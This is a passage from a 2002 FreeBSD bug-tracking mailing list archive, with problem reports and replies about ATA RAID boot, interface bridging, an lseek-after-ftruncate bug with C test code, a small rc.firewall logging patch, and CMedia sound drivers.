(Postfix) with ESMTP id CE0D337B400; Mon, 19 Aug 2002 11:57:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7E13243E4A; Mon, 19 Aug 2002 11:57:12 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JIvCJU026035; Mon, 19 Aug 2002 11:57:12 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JIvCjB026031; Mon, 19 Aug 2002 11:57:12 -0700 (PDT) Date: Mon, 19 Aug 2002 11:57:12 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191857.g7JIvCjB026031@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: i386/28592: Please support boot from ATA RAID-0 device. (/dev/ar0s1a) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Please support boot from ATA RAID-0 device. (/dev/ar0s1a) Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 11:56:42 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=28592 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 12: 7:42 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E626337B400; Mon, 19 Aug 2002 12:07:40 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 93ED543E3B; Mon, 19 Aug 2002 12:07:40 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JJ7eJU032421; Mon, 19 Aug 2002 12:07:40 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JJ7etw032417; Mon, 19 Aug 2002 12:07:40 -0700 (PDT) Date: Mon, 19 Aug 2002 12:07:40 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191907.g7JJ7etw032417@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, brian@FreeBSD.org Subject: Re: bin/18587: /etc/security: improove the dmesg diff output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /etc/security: improove the dmesg diff output Responsible-Changed-From-To: freebsd-bugs->brian Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 12:07:17 PDT 2002 Responsible-Changed-Why: Over to our periodic guru. http://www.freebsd.org/cgi/query-pr.cgi?pr=18587 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 12:50:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4350437B401 for ; Mon, 19 Aug 2002 12:50:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E3F9243E65 for ; Mon, 19 Aug 2002 12:50:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JJo4JU040248 for ; Mon, 19 Aug 2002 12:50:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JJo43d040246; Mon, 19 Aug 2002 12:50:04 -0700 (PDT) Date: Mon, 19 Aug 2002 12:50:04 -0700 (PDT) Message-Id: <200208191950.g7JJo43d040246@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Lars Eggert Subject: Re: kern/41632: bridging when one interface has no carrier Reply-To: Lars Eggert Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41632; it has been noted by GNATS. From: Lars Eggert To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: kern/41632: bridging when one interface has no carrier Date: Mon, 19 Aug 2002 12:47:28 -0700 This is a cryptographically signed message in MIME format. --------------ms090503040502050506000805 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit A more detailed explanation with some clarifications: I have a machine with to Ethernet interfaces, if0 and if1. They are bridged together, if0 has IP address A, if1 doesn't have one. There are applications listening on IP address A. When if0 is down, packets destined for A (or broadcast) coming in over if1 aren't received by these applications. This seems wrong. Conceptually, a set of bridged interfaces should have a single IP address assigned to it, and processes listening on that IP address should receive packets whether or not some of the interfaces in the bridge are down. We currently approximate this by having one interface in the bridge set carry the IP address. This works fine UNLESS that interface happens to be down. In that case, packets fall on the floor. -- Lars Eggert USC Information Sciences Institute --------------ms090503040502050506000805 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIrjCC ArUwggIeoAMCAQICAwWBRzANBgkqhkiG9w0BAQIFADCBkjELMAkGA1UEBhMCWkExFTATBgNV BAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUx HTAbBgNVBAsTFENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVl bWFpbCBSU0EgMjAwMC44LjMwMB4XDTAxMDgyNDE2NDAwMFoXDTAyMDgyNDE2NDAwMFowVDEP MA0GA1UEBBMGRWdnZXJ0MQ0wCwYDVQQqEwRMYXJzMRQwEgYDVQQDEwtMYXJzIEVnZ2VydDEc MBoGCSqGSIb3DQEJARYNbGFyc2VAaXNpLmVkdTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC gYEA0AvLBsD78nxcUHeHkaMgl3b4qYPnfgbf8Lh+HQP8RgGMRG/Yb+vTpkGezlwt9pkJxiD1 1uZDy4CNNJUu3gKxKSb+zRV70O+lkwwftuHoLHoH4xwo3LcQ2LGDpd+I95tUN4dfJ3TmeEcU SF50dC/SuUI4w8AlhXQ8IxrhgdayTpECAwEAAaNWMFQwKgYFK2UBBAEEITAfAgEAMBowGAIB BAQTTDJ1TXlmZkJOVWJOSkpjZFoyczAYBgNVHREEETAPgQ1sYXJzZUBpc2kuZWR1MAwGA1Ud EwEB/wQCMAAwDQYJKoZIhvcNAQECBQADgYEAheZhn0pQA8zI7U2K1ZIAl11j0a1DKxnp3GtT vOUrGRB3WvYxidvdZ1kizhEsWeXU81TkNDH0DaRqtOEeu6Q2OhB+jeKEqY7IDAJE4/fI0e+d 6PnG1hd+vEvYmsKHkmzBhPc94XUOKNWO+qVNP2NGyNI3QIDy5wX4fdcOo1S34r4wggK1MIIC HqADAgECAgMFgUcwDQYJKoZIhvcNAQECBQAwgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxX ZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYD VQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwg UlNBIDIwMDAuOC4zMDAeFw0wMTA4MjQxNjQwMDBaFw0wMjA4MjQxNjQwMDBaMFQxDzANBgNV BAQTBkVnZ2VydDENMAsGA1UEKhMETGFyczEUMBIGA1UEAxMLTGFycyBFZ2dlcnQxHDAaBgkq hkiG9w0BCQEWDWxhcnNlQGlzaS5lZHUwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANAL ywbA+/J8XFB3h5GjIJd2+KmD534G3/C4fh0D/EYBjERv2G/r06ZBns5cLfaZCcYg9dbmQ8uA jTSVLt4CsSkm/s0Ve9DvpZMMH7bh6Cx6B+McKNy3ENixg6XfiPebVDeHXyd05nhHFEhedHQv 0rlCOMPAJYV0PCMa4YHWsk6RAgMBAAGjVjBUMCoGBStlAQQBBCEwHwIBADAaMBgCAQQEE0wy dU15ZmZCTlViTkpKY2RaMnMwGAYDVR0RBBEwD4ENbGFyc2VAaXNpLmVkdTAMBgNVHRMBAf8E AjAAMA0GCSqGSIb3DQEBAgUAA4GBAIXmYZ9KUAPMyO1NitWSAJddY9GtQysZ6dxrU7zlKxkQ d1r2MYnb3WdZIs4RLFnl1PNU5DQx9A2karThHrukNjoQfo3ihKmOyAwCROP3yNHvnej5xtYX frxL2JrCh5JswYT3PeF1DijVjvqlTT9jRsjSN0CA8ucF+H3XDqNUt+K+MIIDODCCAqGgAwIB AgIQZkVyt8x09c9jdkWE0C6RATANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTAT BgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3 dGUgQ29uc3VsdGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lv bjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkB FhxwZXJzb25hbC1mcmVlbWFpbEB0aGF3dGUuY29tMB4XDTAwMDgzMDAwMDAwMFoXDTA0MDgy NzIzNTk1OVowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNV BAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBT ZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMDCBnzAN BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA3jMypmPHCSVFPtJueCdngcXaiBmClw7jRCmKYzUq bXA8+tyu9+50bzC8M5B/+TRxoKNtmPHDT6Jl2w36S/HW3WGl+YXNVZo1Gp2Sdagnrthy+boC 9tewkd4c6avgGAOofENCUFGHgzzwObSbVIoTh/+zm51JZgAtCYnslGvpoWkCAwEAAaNOMEww KQYDVR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDEtMjk3MBIGA1UdEwEB/wQI MAYBAf8CAQAwCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBBAUAA4GBADGxS0dd+QFx5fVTbF15 1j2YwCYTYoEipxL4IpXoG0m3J3sEObr85vIk65H6vewNKjj3UFWobPcNrUwbvAP0teuiR59s ogxYjTFCCRFssBpp0SsSskBdavl50OouJd2K5PzbDR+dAvNa28o89kTqJmmHf0iezqWf54TY yWJirQXGMYICpjCCAqICAQEwgZowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJu IENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRD ZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIw MDAuOC4zMAIDBYFHMAkGBSsOAwIaBQCgggFhMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEw HAYJKoZIhvcNAQkFMQ8XDTAyMDgxOTE5NDcyOFowIwYJKoZIhvcNAQkEMRYEFFeNqKe5Y9ly ZJvUFXgngSEid+JzMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcNAwcwDgYIKoZIhvcNAwIC AgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMIGtBgsqhkiG9w0B CRACCzGBnaCBmjCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAG A1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRl IFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwAgMF gUcwDQYJKoZIhvcNAQEBBQAEgYB8sCVz6a07aViw6uJAz3g9uu9nAgPGSArZkNXyhm5LfkdN m4H1Yz7ODwCvzABchz2ZoEYt8OhK30xcDbQIX2CMsUYhQporqgIo94P0OKfl6vPILuLIn2CN co9Hh+E1wKKW6jlM6KSEGS4xhTTJCYs/LSwTMU3DKy9Ti6Z3y/q5WgAAAAAAAA== --------------ms090503040502050506000805-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 13: 0:33 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF6C037B401 for ; Mon, 19 Aug 2002 13:00:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E80A943E84 for ; Mon, 19 Aug 2002 13:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JK04JU043888 for ; Mon, 19 Aug 2002 13:00:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JK04x8043887; Mon, 19 Aug 2002 13:00:04 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C0C6537B400 for ; Mon, 19 Aug 2002 12:51:31 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3465B43E3B for ; Mon, 19 Aug 2002 12:51:31 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JJpUOT099118 for ; Mon, 19 Aug 2002 12:51:30 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7JJpUcB099117; Mon, 19 Aug 2002 12:51:30 -0700 (PDT) Message-Id: <200208191951.g7JJpUcB099117@www.freebsd.org> Date: Mon, 19 Aug 2002 12:51:30 -0700 (PDT) From: Yury Izrailevsky To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41792: lseek after ftruncate fails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41792 >Category: misc >Synopsis: lseek after ftruncate fails >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 13:00:04 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Yury Izrailevsky >Release: FreeBSD 4.6.1 RELEASE >Organization: University of Utah >Environment: FreeBSD 4.6.1-RELEASE-p10 >Description: File operation problem. Running the following: write(fd, buffer, 8K); ftruncate(fd, 0); write(fd, buffer, 1); off = lseek(fd, 0, SEEK_END); printf("%d", off); Output: 24576, expected: 1. The size of the actual file is 1 (if you ls -l on it). However, lseek goes way past it... Noticed this while running connectathon rewind test (part of special test suite). But fails even if don't go over NFS but just run on the local file system. I suspect the problem is with the FS cache. Or perhaps lseek and/or ftruncate are just broken... >How-To-Repeat: Here is the full source code. Running it on a 4.6 BSD causes the problem described above: #if defined (DOS) || defined (WIN32) #define DOSorWIN32 #include "../tests.h" #endif #ifndef DOSorWIN32 #include #include #include #include #include #include #endif /* DOSorWIN32 */ main() { char buffer[8192]; int size = 8192; int fd; int i; off_t off; #ifdef DOSorWIN32 fprintf(stderr, "This Test Not Executable on DOS or Windows\n"); exit(1); #else if ((fd = open("test.file", O_RDWR | O_CREAT, 0666)) == -1) { perror("open"); exit(1); } for (i = 0; i < 3; i++) { if (write(fd, buffer, size) != size) { perror("write"); exit(1); } } if ((off = lseek(fd, (off_t)0, SEEK_SET)) != 0) { printf("file offset=%ld, expected 0\n", (long)off); exit(1); } if (ftruncate(fd, 0)) { perror("ftruncate"); exit(1); } if (write(fd, buffer, 1) != 1) { perror("write"); exit(1); } if ((off = lseek(fd, 0, SEEK_END)) != 1) { printf("file offset=%ld, expected 1\n", (long)off); exit(1); } close(fd); exit(0); #endif /* DOSorWIN32 */ } >Fix: Works fine on FreeBSD 4.5 and earlier. Thanks for the help! >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 13:10: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DA9C637B400 for ; Mon, 19 Aug 2002 13:10:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 85C2743E6A for ; Mon, 19 Aug 2002 13:10:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JKA4JU050534 for ; Mon, 19 Aug 2002 13:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JKA4hB050533; Mon, 19 Aug 2002 13:10:04 -0700 (PDT) Date: Mon, 19 Aug 2002 13:10:04 -0700 (PDT) Message-Id: <200208192010.g7JKA4hB050533@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Yury Izrailevsky" Subject: Re: misc/41792: lseek after ftruncate fails Reply-To: "Yury Izrailevsky" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41792; it has been noted by GNATS. From: "Yury Izrailevsky" To: , Cc: Subject: Re: misc/41792: lseek after ftruncate fails Date: Mon, 19 Aug 2002 13:15:18 -0700 Clarification: apparently, BSD 4.5 also has the problem. 4.4-STABLE is fine though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 14:52:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1611D37B401; Mon, 19 Aug 2002 14:52:21 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7EDAA43E3B; Mon, 19 Aug 2002 14:52:21 -0700 (PDT) (envelope-from keramida@FreeBSD.org) Received: from freefall.freebsd.org (keramida@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JLqLJU074763; Mon, 19 Aug 2002 14:52:21 -0700 (PDT) (envelope-from keramida@freefall.freebsd.org) Received: (from keramida@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JLqL0c074759; Mon, 19 Aug 2002 14:52:21 -0700 (PDT) Date: Mon, 19 Aug 2002 14:52:21 -0700 (PDT) From: Giorgos Keramidas Message-Id: <200208192152.g7JLqL0c074759@freefall.freebsd.org> To: keramida@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/41373: Infinite loop in boot process while probing ATAPI CDROM Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Old Synopsis: New Synopsis: Infinite loop in boot process while probing ATAPI CDROM Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: keramida Responsible-Changed-When: Mon Aug 19 14:48:03 PDT 2002 Responsible-Changed-Why: Refile misfiled PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=41373 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15: 0:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0D37537B400 for ; Mon, 19 Aug 2002 15:00:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C07AB43E4A for ; Mon, 19 Aug 2002 15:00:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JM0AJU075324 for ; Mon, 19 Aug 2002 15:00:10 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JM0Al2075323; Mon, 19 Aug 2002 15:00:10 -0700 (PDT) Date: Mon, 19 Aug 2002 15:00:10 -0700 (PDT) Message-Id: <200208192200.g7JM0Al2075323@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: misc/41792: lseek after ftruncate fails Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41792; it has been noted by GNATS. From: Bruce Evans To: Yury Izrailevsky Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/41792: lseek after ftruncate fails Date: Tue, 20 Aug 2002 07:58:51 +1000 (EST) On Mon, 19 Aug 2002, Yury Izrailevsky wrote: > >Description: > File operation problem. Running the following: > > write(fd, buffer, 8K); > ftruncate(fd, 0); > write(fd, buffer, 1); > off = lseek(fd, 0, SEEK_END); > printf("%d", off); > > Output: 24576, expected: 1. > > The size of the actual file is 1 (if you ls -l on it). However, lseek goes way past it... > > Noticed this while running connectathon rewind test (part of special test suite). But fails even if don't go over NFS but just run on the local file system. > > I suspect the problem is with the FS cache. Or perhaps lseek and/or ftruncate are just broken... This only fails over nfs under -current. stat(2) and thus ls(1) shows that the file size is 24576 until the next read(2) of the file. Then the size becomes 1. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15:10:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 13A8B37B400 for ; Mon, 19 Aug 2002 15:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 60AB743E65 for ; Mon, 19 Aug 2002 15:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JMA2JU081660 for ; Mon, 19 Aug 2002 15:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JMA2Ro081659; Mon, 19 Aug 2002 15:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BF04337B400 for ; Mon, 19 Aug 2002 15:03:04 -0700 (PDT) Received: from zpfe.com (dev06.eqp.zpfe.com [209.46.51.22]) by mx1.FreeBSD.org (Postfix) with SMTP id 0562E43E42 for ; Mon, 19 Aug 2002 15:03:04 -0700 (PDT) (envelope-from stevep@magpie.zpfe.com) Received: (qmail 37700 invoked by uid 3205); 19 Aug 2002 22:02:53 -0000 Message-Id: <20020819220253.37699.qmail@magpie.zpfe.com> Date: 19 Aug 2002 22:02:53 -0000 From: steve@zpfe.com Reply-To: steve@zpfe.com To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: conf/41801: Patch to rc.firewall to log missing firewall rules file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41801 >Category: conf >Synopsis: Patch to rc.firewall to log missing firewall rules file >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 15:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: steve@zpfe.com >Release: FreeBSD 4.6.2-RELEASE i386 >Organization: self >Environment: System: FreeBSD magpie.zpfe.com 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #4: Sat Aug 17 14:22:34 CDT 2002 root@magpie.zpfe.com:/usr/obj/usr/src/sys/MAGPIE i386 >Description: In troubleshooting a firewall problem I had, there was a subtle typo in the name of the firewall rules file. The proposed patch makes it clear that the specified rules file does not exist. >How-To-Repeat: Specify firewall_type in rc.conf with an invalid file name. >Fix: This is a patch to /etc/rc.firewall version 1.30.2.15. --- rc.firewall.patch begins here --- *** /etc/rc.firewall Wed Jul 10 15:55:54 2002 --- /etc/rc.firewall.new Mon Aug 19 15:39:22 2002 *************** *** 296,301 **** --- 296,303 ---- *) if [ -r "${firewall_type}" ]; then ${fwcmd} ${firewall_flags} ${firewall_type} + else + echo "Firewall rules file ${firewall_type} not found." fi ;; esac --- rc.firewall.patch ends here --- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 15:10:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D772D37B401 for ; Mon, 19 Aug 2002 15:10:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 93D5943E65 for ; Mon, 19 Aug 2002 15:10:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JMA6JU081675 for ; Mon, 19 Aug 2002 15:10:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JMA6oY081674; Mon, 19 Aug 2002 15:10:06 -0700 (PDT) Date: Mon, 19 Aug 2002 15:10:06 -0700 (PDT) Message-Id: <200208192210.g7JMA6oY081674@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Giorgos Keramidas Subject: Re: misc/40081: noise in sound output with built-in CMedia CMI8738 on an iwill KK266 Reply-To: Giorgos Keramidas Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/40081; it has been noted by GNATS. From: Giorgos Keramidas To: James Pye Cc: bug-followup@FreeBSD.org Subject: Re: misc/40081: noise in sound output with built-in CMedia CMI8738 on an iwill KK266 Date: Tue, 20 Aug 2002 01:05:51 +0300 (( Adding to audit trail. )) Message-Id: <200207280759.g6S7xes27539@brother.ludd.luth.se> Date: Sun, 28 Jul 2002 09:59:40 +0200 (MEST) From: Peter B Subject: pending/41080: PR 40081 Hi! I can confirm that the problem in PR 40081 exist for Asus A7V333-Raid,Fw,Snd motherboard aswell. And that the solution is the same. That is get snd_pcm.ko _and_ snd_cmi.ko from freebsd 4.5, then execute: kldload /path/snd_pcm.ko kldload /path/snd_cmi.ko Make sure it won't load snd stuff 